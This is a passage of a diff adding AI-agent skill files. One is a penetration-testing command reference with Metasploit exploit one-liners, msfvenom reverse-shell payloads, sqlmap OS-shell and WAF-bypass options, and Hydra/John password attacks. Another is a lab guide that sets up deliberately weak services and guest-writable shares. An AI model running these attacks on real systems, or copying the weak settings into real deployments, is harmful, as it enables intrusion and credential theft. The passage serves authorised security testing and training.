|
||||
- 7 connections reserved for Neon superuser
|
||||
|
||||
Use pooled endpoint for application, direct for migrations.
|
||||
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Issue | high | See docs |
|
||||
| Issue | high | See docs |
|
||||
| Issue | high | See docs |
|
||||
| Issue | medium | See docs |
|
||||
| Issue | medium | See docs |
|
||||
| Issue | low | See docs |
|
||||
| Issue | medium | See docs |
|
||||
| Issue | high | See docs |
|
||||
339
skills/network-101/SKILL.md
Normal file
339
skills/network-101/SKILL.md
Normal file
@@ -0,0 +1,339 @@
|
||||
---
|
||||
name: Network 101
|
||||
description: This skill should be used when the user asks to "set up a web server", "configure HTTP or HTTPS", "perform SNMP enumeration", "configure SMB shares", "test network services", or needs guidance on configuring and testing network services for penetration testing labs.
|
||||
---
|
||||
|
||||
# Network 101
|
||||
|
||||
## Purpose
|
||||
|
||||
Configure and test common network services (HTTP, HTTPS, SNMP, SMB) for penetration testing lab environments. Enable hands-on practice with service enumeration, log analysis, and security testing against properly configured target systems.
|
||||
|
||||
## Inputs/Prerequisites
|
||||
|
||||
- Windows Server or Linux system for hosting services
|
||||
- Kali Linux or similar for testing
|
||||
- Administrative access to target system
|
||||
- Basic networking knowledge (IP addressing, ports)
|
||||
- Firewall access for port configuration
|
||||
|
||||
## Outputs/Deliverables
|
||||
|
||||
- Configured HTTP/HTTPS web server
|
||||
- SNMP service with accessible communities
|
||||
- SMB file shares with various permission levels
|
||||
- Captured logs for analysis
|
||||
- Documented enumeration results
|
||||
|
||||
## Core Workflow
|
||||
|
||||
### 1. Configure HTTP Server (Port 80)
|
||||
|
||||
Set up a basic HTTP web server for testing:
|
||||
|
||||
**Windows IIS Setup:**
|
||||
1. Open IIS Manager (Internet Information Services)
|
||||
2. Right-click Sites → Add Website
|
||||
3. Configure site name and physical path
|
||||
4. Bind to IP address and port 80
|
||||
|
||||
**Linux Apache Setup:**
|
||||
|
||||
```bash
|
||||
# Install Apache
|
||||
sudo apt update && sudo apt install apache2
|
||||
|
||||
# Start service
|
||||
sudo systemctl start apache2
|
||||
sudo systemctl enable apache2
|
||||
|
||||
# Create test page
|
||||
echo "<html><body><h1>Test Page</h1></body></html>" | sudo tee /var/www/html/index.html
|
||||
|
||||
# Verify service
|
||||
curl http://localhost
|
||||
```
|
||||
|
||||
**Configure Firewall for HTTP:**
|
||||
|
||||
```bash
|
||||
# Linux (UFW)
|
||||
sudo ufw allow 80/tcp
|
||||
|
||||
# Windows PowerShell
|
||||
New-NetFirewallRule -DisplayName "HTTP" -Direction Inbound -Protocol TCP -LocalPort 80 -Action Allow
|
||||
```
|
||||
|
||||
### 2. Configure HTTPS Server (Port 443)
|
||||
|
||||
Set up secure HTTPS with SSL/TLS:
|
||||
|
||||
**Generate Self-Signed Certificate:**
|
||||
|
||||
```bash
|
||||
# Linux - Generate certificate
|
||||
sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
|
||||
-keyout /etc/ssl/private/apache-selfsigned.key \
|
||||
-out /etc/ssl/certs/apache-selfsigned.crt
|
||||
|
||||
# Enable SSL module
|
||||
sudo a2enmod ssl
|
||||
sudo systemctl restart apache2
|
||||
```
|
||||
|
||||
**Configure Apache for HTTPS:**
|
||||
|
||||
```bash
|
||||
# Edit SSL virtual host
|
||||
sudo nano /etc/apache2/sites-available/default-ssl.conf
|
||||
|
||||
# Enable site
|
||||
sudo a2ensite default-ssl
|
||||
sudo systemctl reload apache2
|
||||
```
|
||||
|
||||
**Verify HTTPS Setup:**
|
||||
|
||||
```bash
|
||||
# Check port 443 is open
|
||||
nmap -p 443 192.168.1.1
|
||||
|
||||
# Test SSL connection
|
||||
openssl s_client -connect 192.168.1.1:443
|
||||
|
||||
# Check certificate
|
||||
curl -kv https://192.168.1.1
|
||||
```
|
||||
|
||||
### 3. Configure SNMP Service (Port 161)
|
||||
|
||||
Set up SNMP for enumeration practice:
|
||||
|
||||
**Linux SNMP Setup:**
|
||||
|
||||
```bash
|
||||
# Install SNMP daemon
|
||||
sudo apt install snmpd snmp
|
||||
|
||||
# Configure community strings
|
||||
sudo nano /etc/snmp/snmpd.conf
|
||||
|
||||
# Add these lines:
|
||||
# rocommunity public
|
||||
# rwcommunity private
|
||||
|
||||
# Restart service
|
||||
sudo systemctl restart snmpd
|
||||
```
|
||||
|
||||
**Windows SNMP Setup:**
|
||||
1. Open Server Manager → Add Features
|
||||
2. Select SNMP Service
|
||||
3. Configure community strings in Services → SNMP Service → Properties
|
||||
|
||||
**SNMP Enumeration Commands:**
|
||||
|
||||
```bash
|
||||
# Basic SNMP walk
|
||||
snmpwalk -c public -v1 192.168.1.1
|
||||
|
||||
# Enumerate system info
|
||||
snmpwalk -c public -v1 192.168.1.1 1.3.6.1.2.1.1
|
||||
|
||||
# Get running processes
|
||||
snmpwalk -c public -v1 192.168.1.1 1.3.6.1.2.1.25.4.2.1.2
|
||||
|
||||
# SNMP check tool
|
||||
snmp-check 192.168.1.1 -c public
|
||||
|
||||
# Brute force community strings
|
||||
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 192.168.1.1
|
||||
```
|
||||
|
||||
### 4. Configure SMB Service (Port 445)
|
||||
|
||||
Set up SMB file shares for enumeration:
|
||||
|
||||
**Windows SMB Share:**
|
||||
1. Create folder to share
|
||||
2. Right-click → Properties → Sharing → Advanced Sharing
|
||||
3. Enable sharing and set permissions
|
||||
4. Configure NTFS permissions
|
||||
|
||||
**Linux Samba Setup:**
|
||||
|
||||
```bash
|
||||
# Install Samba
|
||||
sudo apt install samba
|
||||
|
||||
# Create share directory
|
||||
sudo mkdir -p /srv/samba/share
|
||||
sudo chmod 777 /srv/samba/share
|
||||
|
||||
# Configure Samba
|
||||
sudo nano /etc/samba/smb.conf
|
||||
|
||||
# Add share:
|
||||
# [public]
|
||||
# path = /srv/samba/share
|
||||
# browsable = yes
|
||||
# guest ok = yes
|
||||
# read only = no
|
||||
|
||||
# Restart service
|
||||
sudo systemctl restart smbd
|
||||
```
|
||||
|
||||
**SMB Enumeration Commands:**
|
||||
|
||||
```bash
|
||||
# List shares anonymously
|
||||
smbclient -L //192.168.1.1 -N
|
||||
|
||||
# Connect to share
|
||||
smbclient //192.168.1.1/share -N
|
||||
|
||||
# Enumerate with smbmap
|
||||
smbmap -H 192.168.1.1
|
||||
|
||||
# Full enumeration
|
||||
enum4linux -a 192.168.1.1
|
||||
|
||||
# Check for vulnerabilities
|
||||
nmap --script smb-vuln* 192.168.1.1
|
||||
```
|
||||
|
||||
### 5. Analyze Service Logs
|
||||
|
||||
Review logs for security analysis:
|
||||
|
||||
**HTTP/HTTPS Logs:**
|
||||
|
||||
```bash
|
||||
# Apache access log
|
||||
sudo tail -f /var/log/apache2/access.log
|
||||
|
||||
# Apache error log
|
||||
sudo tail -f /var/log/apache2/error.log
|
||||
|
||||
# Windows IIS logs
|
||||
# Location: C:\inetpub\logs\LogFiles\W3SVC1\
|
||||
```
|
||||
|
||||
**Parse Log for Credentials:**
|
||||
|
||||
```bash
|
||||
# Search for POST requests
|
||||
grep "POST" /var/log/apache2/access.log
|
||||
|
||||
# Extract user agents
|
||||
awk '{print $12}' /var/log/apache2/access.log | sort | uniq -c
|
||||
```
|
||||
|
||||
## Quick Reference
|
||||
|
||||
### Essential Ports
|
||||
|
||||
| Service | Port | Protocol |
|
||||
|---------|------|----------|
|
||||
| HTTP | 80 | TCP |
|
||||
| HTTPS | 443 | TCP |
|
||||
| SNMP | 161 | UDP |
|
||||
| SMB | 445 | TCP |
|
||||
| NetBIOS | 137-139 | TCP/UDP |
|
||||
|
||||
### Service Verification Commands
|
||||
|
||||
```bash
|
||||
# Check HTTP
|
||||
curl -I http://target
|
||||
|
||||
# Check HTTPS
|
||||
curl -kI https://target
|
||||
|
||||
# Check SNMP
|
||||
snmpwalk -c public -v1 target
|
||||
|
||||
# Check SMB
|
||||
smbclient -L //target -N
|
||||
```
|
||||
|
||||
### Common Enumeration Tools
|
||||
|
||||
| Tool | Purpose |
|
||||
|------|---------|
|
||||
| nmap | Port scanning and scripts |
|
||||
| nikto | Web vulnerability scanning |
|
||||
| snmpwalk | SNMP enumeration |
|
||||
| enum4linux | SMB/NetBIOS enumeration |
|
||||
| smbclient | SMB connection |
|
||||
| gobuster | Directory brute forcing |
|
||||
|
||||
## Constraints
|
||||
|
||||
- Self-signed certificates trigger browser warnings
|
||||
- SNMP v1/v2c communities transmit in cleartext
|
||||
- Anonymous SMB access is often disabled by default
|
||||
- Firewall rules must allow inbound connections
|
||||
- Lab environments should be isolated from production
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: Complete HTTP Lab Setup
|
||||
|
||||
```bash
|
||||
# Install and configure
|
||||
sudo apt install apache2
|
||||
sudo systemctl start apache2
|
||||
|
||||
# Create login page
|
||||
cat << 'EOF' | sudo tee /var/www/html/login.html
|
||||
<html>
|
||||
<body>
|
||||
<form method="POST" action="login.php">
|
||||
Username: <input type="text" name="user"><br>
|
||||
Password: <input type="password" name="pass"><br>
|
||||
<input type="submit" value="Login">
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
EOF
|
||||
|
||||
# Allow through firewall
|
||||
sudo ufw allow 80/tcp
|
||||
```
|
||||
|
||||
### Example 2: SNMP Testing Setup
|
||||
|
||||
```bash
|
||||
# Quick SNMP configuration
|
||||
sudo apt install snmpd
|
||||
echo "rocommunity public" | sudo tee -a /etc/snmp/snmpd.conf
|
||||
sudo systemctl restart snmpd
|
||||
|
||||
# Test enumeration
|
||||
snmpwalk -c public -v1 localhost
|
||||
```
|
||||
|
||||
### Example 3: SMB Anonymous Access
|
||||
|
||||
```bash
|
||||
# Configure anonymous share
|
||||
sudo apt install samba
|
||||
sudo mkdir /srv/samba/anonymous
|
||||
sudo chmod 777 /srv/samba/anonymous
|
||||
|
||||
# Test access
|
||||
smbclient //localhost/anonymous -N
|
||||
```
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
| Issue | Solution |
|
||||
|-------|----------|
|
||||
| Port not accessible | Check firewall rules (ufw, iptables, Windows Firewall) |
|
||||
| Service not starting | Check logs with `journalctl -u service-name` |
|
||||
| SNMP timeout | Verify UDP 161 is open, check community string |
|
||||
| SMB access denied | Verify share permissions and user credentials |
|
||||
| HTTPS certificate error | Accept self-signed cert or add to trusted store |
|
||||
| Cannot connect remotely | Bind service to 0.0.0.0 instead of localhost |
|
||||
56
skills/nextjs-supabase-auth/SKILL.md
Normal file
56
skills/nextjs-supabase-auth/SKILL.md
Normal file
@@ -0,0 +1,56 @@
|
||||
---
|
||||
name: nextjs-supabase-auth
|
||||
description: "Expert integration of Supabase Auth with Next.js App Router Use when: supabase auth next, authentication next.js, login supabase, auth middleware, protected route."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Next.js + Supabase Auth
|
||||
|
||||
You are an expert in integrating Supabase Auth with Next.js App Router.
|
||||
You understand the server/client boundary, how to handle auth in middleware,
|
||||
Server Components, Client Components, and Server Actions.
|
||||
|
||||
Your core principles:
|
||||
1. Use @supabase/ssr for App Router integration
|
||||
2. Handle tokens in middleware for protected routes
|
||||
3. Never expose auth tokens to client unnecessarily
|
||||
4. Use Server Actions for auth operations when possible
|
||||
5. Understand the cookie-based session flow
|
||||
|
||||
## Capabilities
|
||||
|
||||
- nextjs-auth
|
||||
- supabase-auth-nextjs
|
||||
- auth-middleware
|
||||
- auth-callback
|
||||
|
||||
## Requirements
|
||||
|
||||
- nextjs-app-router
|
||||
- supabase-backend
|
||||
|
||||
## Patterns
|
||||
|
||||
### Supabase Client Setup
|
||||
|
||||
Create properly configured Supabase clients for different contexts
|
||||
|
||||
### Auth Middleware
|
||||
|
||||
Protect routes and refresh sessions in middleware
|
||||
|
||||
### Auth Callback Route
|
||||
|
||||
Handle OAuth callback and exchange code for session
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ getSession in Server Components
|
||||
|
||||
### ❌ Auth State in Client Without Listener
|
||||
|
||||
### ❌ Storing Tokens Manually
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `nextjs-app-router`, `supabase-backend`
|
||||
216
skills/notion-template-business/SKILL.md
Normal file
216
skills/notion-template-business/SKILL.md
Normal file
@@ -0,0 +1,216 @@
|
||||
---
|
||||
name: notion-template-business
|
||||
description: "Expert in building and selling Notion templates as a business - not just making templates, but building a sustainable digital product business. Covers template design, pricing, marketplaces, marketing, and scaling to real revenue. Use when: notion template, sell templates, digital product, notion business, gumroad."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Notion Template Business
|
||||
|
||||
**Role**: Template Business Architect
|
||||
|
||||
You know templates are real businesses that can generate serious income.
|
||||
You've seen creators make six figures selling Notion templates. You
|
||||
understand it's not about the template - it's about the problem it solves.
|
||||
You build systems that turn templates into scalable digital products.
|
||||
|
||||
## Capabilities
|
||||
|
||||
- Notion template design
|
||||
- Template pricing strategies
|
||||
- Gumroad/Lemon Squeezy setup
|
||||
- Template marketing
|
||||
- Notion marketplace strategy
|
||||
- Template support systems
|
||||
- Template documentation
|
||||
- Bundle strategies
|
||||
|
||||
## Patterns
|
||||
|
||||
### Template Design
|
||||
|
||||
Creating templates people pay for
|
||||
|
||||
**When to use**: When designing a Notion template
|
||||
|
||||
```javascript
|
||||
## Template Design
|
||||
|
||||
### What Makes Templates Sell
|
||||
| Factor | Why It Matters |
|
||||
|--------|----------------|
|
||||
| Solves specific problem | Clear value proposition |
|
||||
| Beautiful design | First impression, shareability |
|
||||
| Easy to customize | Users make it their own |
|
||||
| Good documentation | Reduces support, increases satisfaction |
|
||||
| Comprehensive | Feels worth the price |
|
||||
|
||||
### Template Structure
|
||||
```
|
||||
Template Package:
|
||||
├── Main Template
|
||||
│ ├── Dashboard (first impression)
|
||||
│ ├── Core Pages (main functionality)
|
||||
│ ├── Supporting Pages (extras)
|
||||
│ └── Examples/Sample Data
|
||||
├── Documentation
|
||||
│ ├── Getting Started Guide
|
||||
│ ├── Feature Walkthrough
|
||||
│ └── FAQ
|
||||
└── Bonus
|
||||
├── Icon Pack
|
||||
└── Color Themes
|
||||
```
|
||||
|
||||
### Design Principles
|
||||
- Clean, consistent styling
|
||||
- Clear hierarchy and navigation
|
||||
- Helpful empty states
|
||||
- Example data to show possibilities
|
||||
- Mobile-friendly views
|
||||
|
||||
### Template Categories That Sell
|
||||
| Category | Examples |
|
||||
|----------|----------|
|
||||
| Productivity | Second brain, task management |
|
||||
| Business | CRM, project management |
|
||||
| Personal | Finance tracker, habit tracker |
|
||||
| Education | Study system, course notes |
|
||||
| Creative | Content calendar, portfolio |
|
||||
```
|
||||
|
||||
### Pricing Strategy
|
||||
|
||||
Pricing Notion templates for profit
|
||||
|
||||
**When to use**: When setting template prices
|
||||
|
||||
```javascript
|
||||
## Template Pricing
|
||||
|
||||
### Price Anchoring
|
||||
| Tier | Price Range | What to Include |
|
||||
|------|-------------|-----------------|
|
||||
| Basic | $15-29 | Core template only |
|
||||
| Pro | $39-79 | Template + extras |
|
||||
| Ultimate | $99-199 | Everything + updates |
|
||||
|
||||
### Pricing Factors
|
||||
```
|
||||
Value created:
|
||||
- Time saved per month × 12 months
|
||||
- Problems solved
|
||||
- Comparable products cost
|
||||
|
||||
Example:
|
||||
- Saves 5 hours/month
|
||||
- 5 hours × $50/hour × 12 = $3000 value
|
||||
- Price at $49-99 (1-3% of value)
|
||||
```
|
||||
|
||||
### Bundle Strategy
|
||||
- Individual templates: $29-49
|
||||
- Bundle of 3-5: $79-129 (30% off)
|
||||
- All-access: $149-299 (best value)
|
||||
|
||||
### Free vs Paid
|
||||
| Free Template | Purpose |
|
||||
|---------------|---------|
|
||||
| Lead magnet | Email list growth |
|
||||
| Upsell vehicle | "Get the full version" |
|
||||
| Social proof | Reviews, shares |
|
||||
| SEO | Traffic to paid |
|
||||
```
|
||||
|
||||
### Sales Channels
|
||||
|
||||
Where to sell templates
|
||||
|
||||
**When to use**: When setting up sales
|
||||
|
||||
```javascript
|
||||
## Sales Channels
|
||||
|
||||
### Platform Comparison
|
||||
| Platform | Fee | Pros | Cons |
|
||||
|----------|-----|------|------|
|
||||
| Gumroad | 10% | Simple, trusted | Higher fees |
|
||||
| Lemon Squeezy | 5-8% | Modern, lower fees | Newer |
|
||||
| Notion Marketplace | 0% | Built-in audience | Approval needed |
|
||||
| Your site | 3% (Stripe) | Full control | Build audience |
|
||||
|
||||
### Gumroad Setup
|
||||
```
|
||||
1. Create account
|
||||
2. Add product
|
||||
3. Upload template (duplicate link)
|
||||
4. Write compelling description
|
||||
5. Add preview images/video
|
||||
6. Set price
|
||||
7. Enable discounts
|
||||
8. Publish
|
||||
```
|
||||
|
||||
### Notion Marketplace
|
||||
- Apply as creator
|
||||
- Higher quality bar
|
||||
- Built-in discovery
|
||||
- Lower individual prices
|
||||
- Good for volume
|
||||
|
||||
### Your Own Site
|
||||
- Use Lemon Squeezy embed
|
||||
- Custom landing pages
|
||||
- Build email list
|
||||
- Full brand control
|
||||
```
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Building Without Audience
|
||||
|
||||
**Why bad**: No one knows about you.
|
||||
Launch to crickets.
|
||||
No email list.
|
||||
No social following.
|
||||
|
||||
**Instead**: Build audience first.
|
||||
Share work publicly.
|
||||
Give away free templates.
|
||||
Grow email list.
|
||||
|
||||
### ❌ Too Niche or Too Broad
|
||||
|
||||
**Why bad**: "Notion template" = too vague.
|
||||
"Notion for left-handed fishermen" = too niche.
|
||||
No clear buyer.
|
||||
Weak positioning.
|
||||
|
||||
**Instead**: Specific but sizable market.
|
||||
"Notion for freelancers"
|
||||
"Notion for students"
|
||||
"Notion for small teams"
|
||||
|
||||
### ❌ No Support System
|
||||
|
||||
**Why bad**: Support requests pile up.
|
||||
Bad reviews.
|
||||
Refund requests.
|
||||
Stressful.
|
||||
|
||||
**Instead**: Great documentation.
|
||||
Video walkthrough.
|
||||
FAQ page.
|
||||
Email/chat for premium.
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Templates getting shared/pirated | medium | ## Handling Template Piracy |
|
||||
| Drowning in customer support requests | medium | ## Scaling Template Support |
|
||||
| All sales from one marketplace | medium | ## Diversifying Sales Channels |
|
||||
| Old templates becoming outdated | low | ## Template Update Strategy |
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `micro-saas-launcher`, `copywriting`, `landing-page-design`, `seo`
|
||||
435
skills/pentest-commands/SKILL.md
Normal file
435
skills/pentest-commands/SKILL.md
Normal file
@@ -0,0 +1,435 @@
|
||||
---
|
||||
name: Pentest Commands
|
||||
description: This skill should be used when the user asks to "run pentest commands", "scan with nmap", "use metasploit exploits", "crack passwords with hydra or john", "scan web vulnerabilities with nikto", "enumerate networks", or needs essential penetration testing command references.
|
||||
---
|
||||
|
||||
# Pentest Commands
|
||||
|
||||
## Purpose
|
||||
|
||||
Provide a comprehensive command reference for penetration testing tools including network scanning, exploitation, password cracking, and web application testing. Enable quick command lookup during security assessments.
|
||||
|
||||
## Inputs/Prerequisites
|
||||
|
||||
- Kali Linux or penetration testing distribution
|
||||
- Target IP addresses with authorization
|
||||
- Wordlists for brute forcing
|
||||
- Network access to target systems
|
||||
- Basic understanding of tool syntax
|
||||
|
||||
## Outputs/Deliverables
|
||||
|
||||
- Network enumeration results
|
||||
- Identified vulnerabilities
|
||||
- Exploitation payloads
|
||||
- Cracked credentials
|
||||
- Web vulnerability findings
|
||||
|
||||
## Core Workflow
|
||||
|
||||
### 1. Nmap Commands
|
||||
|
||||
**Host Discovery:**
|
||||
|
||||
```bash
|
||||
# Ping sweep
|
||||
nmap -sP 192.168.1.0/24
|
||||
|
||||
# List IPs without scanning
|
||||
nmap -sL 192.168.1.0/24
|
||||
|
||||
# Ping scan (host discovery)
|
||||
nmap -sn 192.168.1.0/24
|
||||
```
|
||||
|
||||
**Port Scanning:**
|
||||
|
||||
```bash
|
||||
# TCP SYN scan (stealth)
|
||||
nmap -sS 192.168.1.1
|
||||
|
||||
# Full TCP connect scan
|
||||
nmap -sT 192.168.1.1
|
||||
|
||||
# UDP scan
|
||||
nmap -sU 192.168.1.1
|
||||
|
||||
# All ports (1-65535)
|
||||
nmap -p- 192.168.1.1
|
||||
|
||||
# Specific ports
|
||||
nmap -p 22,80,443 192.168.1.1
|
||||
```
|
||||
|
||||
**Service Detection:**
|
||||
|
||||
```bash
|
||||
# Service versions
|
||||
nmap -sV 192.168.1.1
|
||||
|
||||
# OS detection
|
||||
nmap -O 192.168.1.1
|
||||
|
||||
# Comprehensive scan
|
||||
nmap -A 192.168.1.1
|
||||
|
||||
# Skip host discovery
|
||||
nmap -Pn 192.168.1.1
|
||||
```
|
||||
|
||||
**NSE Scripts:**
|
||||
|
||||
```bash
|
||||
# Vulnerability scan
|
||||
nmap --script vuln 192.168.1.1
|
||||
|
||||
# SMB enumeration
|
||||
nmap --script smb-enum-shares -p 445 192.168.1.1
|
||||
|
||||
# HTTP enumeration
|
||||
nmap --script http-enum -p 80 192.168.1.1
|
||||
|
||||
# Check EternalBlue
|
||||
nmap --script smb-vuln-ms17-010 192.168.1.1
|
||||
|
||||
# Check MS08-067
|
||||
nmap --script smb-vuln-ms08-067 192.168.1.1
|
||||
|
||||
# SSH brute force
|
||||
nmap --script ssh-brute -p 22 192.168.1.1
|
||||
|
||||
# FTP anonymous
|
||||
nmap --script ftp-anon 192.168.1.1
|
||||
|
||||
# DNS brute force
|
||||
nmap --script dns-brute 192.168.1.1
|
||||
|
||||
# HTTP methods
|
||||
nmap -p80 --script http-methods 192.168.1.1
|
||||
|
||||
# HTTP headers
|
||||
nmap -p80 --script http-headers 192.168.1.1
|
||||
|
||||
# SQL injection check
|
||||
nmap --script http-sql-injection -p 80 192.168.1.1
|
||||
```
|
||||
|
||||
**Advanced Scans:**
|
||||
|
||||
```bash
|
||||
# Xmas scan
|
||||
nmap -sX 192.168.1.1
|
||||
|
||||
# ACK scan (firewall detection)
|
||||
nmap -sA 192.168.1.1
|
||||
|
||||
# Window scan
|
||||
nmap -sW 192.168.1.1
|
||||
|
||||
# Traceroute
|
||||
nmap --traceroute 192.168.1.1
|
||||
```
|
||||
|
||||
### 2. Metasploit Commands
|
||||
|
||||
**Basic Usage:**
|
||||
|
||||
```bash
|
||||
# Launch Metasploit
|
||||
msfconsole
|
||||
|
||||
# Search for exploits
|
||||
search type:exploit name:smb
|
||||
|
||||
# Use exploit
|
||||
use exploit/windows/smb/ms17_010_eternalblue
|
||||
|
||||
# Show options
|
||||
show options
|
||||
|
||||
# Set target
|
||||
set RHOST 192.168.1.1
|
||||
|
||||
# Set payload
|
||||
set PAYLOAD windows/meterpreter/reverse_tcp
|
||||
|
||||
# Run exploit
|
||||
exploit
|
||||
```
|
||||
|
||||
**Common Exploits:**
|
||||
|
||||
```bash
|
||||
# EternalBlue
|
||||
msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOST 192.168.1.1; exploit"
|
||||
|
||||
# MS08-067 (Conficker)
|
||||
msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 192.168.1.1; exploit"
|
||||
|
||||
# vsftpd backdoor
|
||||
msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOST 192.168.1.1; exploit"
|
||||
|
||||
# Shellshock
|
||||
msfconsole -x "use exploit/linux/http/apache_mod_cgi_bash_env_exec; set RHOST 192.168.1.1; exploit"
|
||||
|
||||
# Drupalgeddon2
|
||||
msfconsole -x "use exploit/unix/webapp/drupal_drupalgeddon2; set RHOST 192.168.1.1; exploit"
|
||||
|
||||
# PSExec
|
||||
msfconsole -x "use exploit/windows/smb/psexec; set RHOST 192.168.1.1; set SMBUser user; set SMBPass pass; exploit"
|
||||
```
|
||||
|
||||
**Scanners:**
|
||||
|
||||
```bash
|
||||
# TCP port scan
|
||||
msfconsole -x "use auxiliary/scanner/portscan/tcp; set RHOSTS 192.168.1.0/24; run"
|
||||
|
||||
# SMB version scan
|
||||
msfconsole -x "use auxiliary/scanner/smb/smb_version; set RHOSTS 192.168.1.0/24; run"
|
||||
|
||||
# SMB share enumeration
|
||||
msfconsole -x "use auxiliary/scanner/smb/smb_enumshares; set RHOSTS 192.168.1.0/24; run"
|
||||
|
||||
# SSH brute force
|
||||
msfconsole -x "use auxiliary/scanner/ssh/ssh_login; set RHOSTS 192.168.1.0/24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run"
|
||||
|
||||
# FTP brute force
|
||||
msfconsole -x "use auxiliary/scanner/ftp/ftp_login; set RHOSTS 192.168.1.0/24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run"
|
||||
|
||||
# RDP scanning
|
||||
msfconsole -x "use auxiliary/scanner/rdp/rdp_scanner; set RHOSTS 192.168.1.0/24; run"
|
||||
```
|
||||
|
||||
**Handler Setup:**
|
||||
|
||||
```bash
|
||||
# Multi-handler for reverse shells
|
||||
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.2; set LPORT 4444; exploit"
|
||||
```
|
||||
|
||||
**Payload Generation (msfvenom):**
|
||||
|
||||
```bash
|
||||
# Windows reverse shell
|
||||
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > shell.exe
|
||||
|
||||
# Linux reverse shell
|
||||
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf > shell.elf
|
||||
|
||||
# PHP reverse shell
|
||||
msfvenom -p php/reverse_php LHOST=192.168.1.2 LPORT=4444 -f raw > shell.php
|
||||
|
||||
# ASP reverse shell
|
||||
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f asp > shell.asp
|
||||
|
||||
# WAR file
|
||||
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f war > shell.war
|
||||
|
||||
# Python payload
|
||||
msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.2 LPORT=4444 -f raw > shell.py
|
||||
```
|
||||
|
||||
### 3. Nikto Commands
|
||||
|
||||
```bash
|
||||
# Basic scan
|
||||
nikto -h http://192.168.1.1
|
||||
|
||||
# Comprehensive scan
|
||||
nikto -h http://192.168.1.1 -C all
|
||||
|
||||
# Output to file
|
||||
nikto -h http://192.168.1.1 -output report.html
|
||||
|
||||
# Plugin-based scans
|
||||
nikto -h http://192.168.1.1 -Plugins robots
|
||||
nikto -h http://192.168.1.1 -Plugins shellshock
|
||||
nikto -h http://192.168.1.1 -Plugins heartbleed
|
||||
nikto -h http://192.168.1.1 -Plugins ssl
|
||||
|
||||
# Export to Metasploit
|
||||
nikto -h http://192.168.1.1 -Format msf+
|
||||
|
||||
# Specific tuning
|
||||
nikto -h http://192.168.1.1 -Tuning 1 # Interesting files only
|
||||
```
|
||||
|
||||
### 4. SQLMap Commands
|
||||
|
||||
```bash
|
||||
# Basic injection test
|
||||
sqlmap -u "http://192.168.1.1/page?id=1"
|
||||
|
||||
# Enumerate databases
|
||||
sqlmap -u "http://192.168.1.1/page?id=1" --dbs
|
||||
|
||||
# Enumerate tables
|
||||
sqlmap -u "http://192.168.1.1/page?id=1" -D database --tables
|
||||
|
||||
# Dump table
|
||||
sqlmap -u "http://192.168.1.1/page?id=1" -D database -T users --dump
|
||||
|
||||
# OS shell
|
||||
sqlmap -u "http://192.168.1.1/page?id=1" --os-shell
|
||||
|
||||
# POST request
|
||||
sqlmap -u "http://192.168.1.1/login" --data="user=admin&pass=test"
|
||||
|
||||
# Cookie injection
|
||||
sqlmap -u "http://192.168.1.1/page" --cookie="id=1*"
|
||||
|
||||
# Bypass WAF
|
||||
sqlmap -u "http://192.168.1.1/page?id=1" --tamper=space2comment
|
||||
|
||||
# Risk and level
|
||||
sqlmap -u "http://192.168.1.1/page?id=1" --risk=3 --level=5
|
||||
```
|
||||
|
||||
### 5. Hydra Commands
|
||||
|
||||
```bash
|
||||
# SSH brute force
|
||||
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1
|
||||
|
||||
# FTP brute force
|
||||
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.1
|
||||
|
||||
# HTTP POST form
|
||||
hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"
|
||||
|
||||
# HTTP Basic Auth
|
||||
hydra -l admin -P passwords.txt 192.168.1.1 http-get /admin/
|
||||
|
||||
# SMB brute force
|
||||
hydra -l admin -P passwords.txt smb://192.168.1.1
|
||||
|
||||
# RDP brute force
|
||||
hydra -l admin -P passwords.txt rdp://192.168.1.1
|
||||
|
||||
# MySQL brute force
|
||||
hydra -l root -P passwords.txt mysql://192.168.1.1
|
||||
|
||||
# Username list
|
||||
hydra -L users.txt -P passwords.txt ssh://192.168.1.1
|
||||
```
|
||||
|
||||
### 6. John the Ripper Commands
|
||||
|
||||
```bash
|
||||
# Crack password file
|
||||
john hash.txt
|
||||
|
||||
# Specify wordlist
|
||||
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
|
||||
|
||||
# Show cracked passwords
|
||||
john hash.txt --show
|
||||
|
||||
# Specify format
|
||||
john hash.txt --format=raw-md5
|
||||
john hash.txt --format=nt
|
||||
john hash.txt --format=sha512crypt
|
||||
|
||||
# SSH key passphrase
|
||||
ssh2john id_rsa > ssh_hash.txt
|
||||
john ssh_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
|
||||
|
||||
# ZIP password
|
||||
